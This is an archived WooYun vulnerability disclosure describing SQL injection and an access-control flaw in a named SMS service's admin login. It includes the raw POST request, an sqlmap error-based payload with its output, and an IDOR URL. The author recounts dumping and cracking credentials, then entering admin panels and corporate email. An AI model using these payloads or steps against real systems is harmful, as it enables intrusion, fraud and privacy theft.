当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0126702

漏洞标题:多打电话某系统SQL注入漏洞(可免费发送任意短信用于诈骗等附送后台越权/涉及N多用户隐私/另可生成充值卡/进入企业邮箱)

相关厂商:iddsms.com

漏洞作者: 天地不仁 以万物为刍狗

提交时间:2015-07-14 14:40

修复时间:2015-07-19 14:42

公开时间:2015-07-19 14:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-14: 细节已通知厂商并且等待厂商处理中
2015-07-19: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

天地本不仁 万物为刍狗
【HD】 以团队之名 以个人之荣耀 共建网络安全

详细说明:

POST数据包:

POST /managerlogin.jsp HTTP/1.1
Host: sms.iddsms.com
Content-Length: 49
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://sms.iddsms.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.1.2238.18 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://sms.iddsms.com/managerlogin.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=EB7432D3B39E5A8AADFF7DE31F54460A
dotype=check&loginuser=admin&loginpswd=admin&qq=+


参数 loginuser 可注入

0.png


看了下 websmss

1.png


虽然用户数量不是很多 也没跑了 跑了下 sys_user 的表(为进一步证明危害 勿怪)

2.png


随便解密了一个登陆了下

3.png


然后······看见短信管理中心···就给自己的手机发了条测试短信·····

4.png


5.jpg


越权:http://sms.iddsms.com/manager/base/tailmt.jsp?seqid=1262236
修改ID可越权

6.png


7.png


8.png


其他的就不说了 下面我们进入 admin 这个账号 里面更劲爆哦

9.png


10.png


这里的用户管理与用户隐私 我就不说了 下面还可以充值卡生成与管理(因为涉及到钱 密码打了马赛克了)

11.png


邮箱的配置

12.png


密码就不用说了吧 很简单拿到手 进入企业邮箱

13.png


14.png


拿到企业邮箱后 可进行进一步的渗透 这里就不继续了

漏洞证明:

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: loginuser (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause
    Payload: dotype=check&loginuser=admin' AND (SELECT 8829 FROM(SELECT COUNT(*)
,CONCAT(0x7171716b71,(SELECT (ELT(8829=8829,1))),0x7170627071,FLOOR(RAND(0)*2))x
 FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'EbDl'='EbDl&loginpswd
=admin&qq=
---
[13:27:35] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[13:27:35] [INFO] fetching database names
[13:27:35] [INFO] the SQL query used returns 2 entries
[13:27:35] [INFO] resumed: information_schema
[13:27:35] [INFO] resumed: websmss
available databases [2]:
[*] information_schema
[*] websmss
[13:27:35] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\sms.iddsms.com'
[*] shutting down at 13:27:35

修复方案:

版权声明:转载请注明来源 天地不仁 以万物为刍狗@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-07-19 14:42

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无

漏洞评价:

评论

  1. 2015-07-14 15:25 | 大亮 ( 普通白帽子 | Rank:306 漏洞数:65 | 慢慢挖洞)

    标题太长了

  2. 2015-07-14 15:28 | 牛 小 帅 ( 普通白帽子 | Rank:363 漏洞数:84 | [code]心若没有栖息的地方,走到哪里都是在...)

    嘎嘎

  3. 2015-07-14 15:31 | 天地不仁 以万物为刍狗 ( 普通白帽子 | Rank:977 漏洞数:264 | 天地本不仁 万物为刍狗)

    @大亮 最近流行长标题 所以 我也试试

  4. 2015-07-22 00:25 | 0x 80 ( 普通白帽子 | Rank:1301 漏洞数:398 | 某安全公司招聘系统运维、渗透测试、安全运...)

    你一天到晚都在POST

  5. 2015-07-22 00:39 | 天地不仁 以万物为刍狗 ( 普通白帽子 | Rank:977 漏洞数:264 | 天地本不仁 万物为刍狗)

    @0x 80 还说我···你不也一样嘛···

  6. 2015-07-22 00:47 | 0x 80 ( 普通白帽子 | Rank:1301 漏洞数:398 | 某安全公司招聘系统运维、渗透测试、安全运...)

    @天地不仁 以万物为刍狗 我哪里天天玩POST了,我很少发POST注入好不好